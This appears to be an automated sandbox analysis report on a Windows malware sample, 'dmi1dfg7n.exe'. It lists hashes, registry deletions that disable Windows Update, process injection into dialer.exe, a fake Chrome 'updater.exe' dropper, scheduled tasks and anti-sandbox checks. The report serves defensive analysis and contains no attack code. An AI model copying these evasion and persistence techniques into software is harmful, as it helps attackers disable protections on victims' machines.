Analysis
- max time kernel: 1801s
- max time network: 1789s
- platform: windows10-2004_x64
- resource: win10v2004-20230621-es
- resource tags: arch:x64, arch:x86, image:win10v2004-20230621-es, locale:es-es, os:windows10-2004-x64, system, windows
- submitted: 29-06-2023 21:17
- Static task: static1
- Behavioral task: behavioral1 (sample dmi1dfg7n.exe, resource win7-20230621-es)
- Behavioral task: behavioral2 (sample dmi1dfg7n.exe, resource win10v2004-20230621-es)
General
- Target: dmi1dfg7n.exe
- Size: 2.8MB
- MD5: 9253ed091d81e076a3037e12af3dc871
- SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
- SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
- SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
- SSDEEP: 49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes:
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation (cmd.exe)
Executes dropped EXE 2 IoCs
Processes:
- PID 852 updater.exe
- PID 4292 updater.exe
Checks system information in the registry 2 TTPs 4 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer (cmd.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName (cmd.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer (cmd.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName (cmd.exe)
Drops file in System32 directory 27 IoCs
Suspicious use of SetThreadContext 11 IoCs
Processes:
- PID 4980 dmi1dfg7n.exe set thread context of PID 2892 dialer.exe
- PID 1688 powershell.EXE set thread context of PID 3720 dllhost.exe
- PID 2824 powershell.EXE set thread context of PID 3084 dllhost.exe
- PID 852 updater.exe set thread context of PID 2672 dialer.exe
- PID 852 updater.exe set thread context of PID 4956 dialer.exe
- PID 2388 dmi1dfg7n.exe set thread context of PID 4488 dialer.exe
- PID 1668 powershell.EXE set thread context of PID 3736 dllhost.exe
- PID 3612 powershell.EXE set thread context of PID 1524 sc.exe
- PID 4408 dmi1dfg7n.exe set thread context of PID 1676 dialer.exe
- PID 2968 powershell.EXE set thread context of PID 1428 dllhost.exe
- PID 1784 powershell.EXE set thread context of PID 3960 dllhost.exe
Drops file in Program Files directory 8 IoCs
Processes:
- File created C:\Program Files\Google\Libs\WR64.sys (updater.exe)
- File opened for modification C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Chrome\updater.exe (dmi1dfg7n.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (updater.exe)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Chrome\updater.exe (dmi1dfg7n.exe)
- File created C:\Program Files\Google\Chrome\updater.exe (dmi1dfg7n.exe)
Drops file in Windows directory 14 IoCs
Processes:
- File opened for modification C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File created C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File created C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File created C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File created C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc64.job (svchost.exe)
- File opened for modification C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File created C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc32.job (svchost.exe)
- File created C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File opened for modification C:\Windows\Tasks\dialersvc32.job (dialer.exe)
Launches sc.exe 25 IoCs
sc.exe is a Windows utility to control services on the system.
Processes (sc.exe PIDs): 3760, 892, 3128, 1524, 4528, 3696, 1268, 5116, 1556, 2836, 496, 1504, 2964, 1688, 3016, 2044, 4132, 560, 3872, 2496, 4648, 3956, 2624, 2560, 2384
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 64 IoCs
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, powershell.EXE, powershell.exe, powershell.EXE, powershell.exe, powershell.EXE, powershell.exe, OfficeClickToRun.exe, powershell.EXE, powershell.EXE, powershell.EXE
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
-
Modifies registry class 64 IoCs
Processes: RuntimeBroker.exe, Explorer.EXE, backgroundTaskHost.exe, sihost.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Cifrado del dispositivo" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000000000000010004170704461746100400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000016000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "Sistema" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "Conexión de RemoteApp y Escritorio" | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Opciones de Internet" | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Reconocimiento de voz" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Administración del color" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | backgroundTaskHost.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Administrador de credenciales" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recuperación" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Opciones de indización" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | RuntimeBroker.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Firewall de Windows Defender" | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e00000014000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\MuiCache | backgroundTaskHost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Programas predeterminados" | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Teléfono y módem" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010005573657273003c0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000055007300650072007300000014000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | Explorer.EXE
-
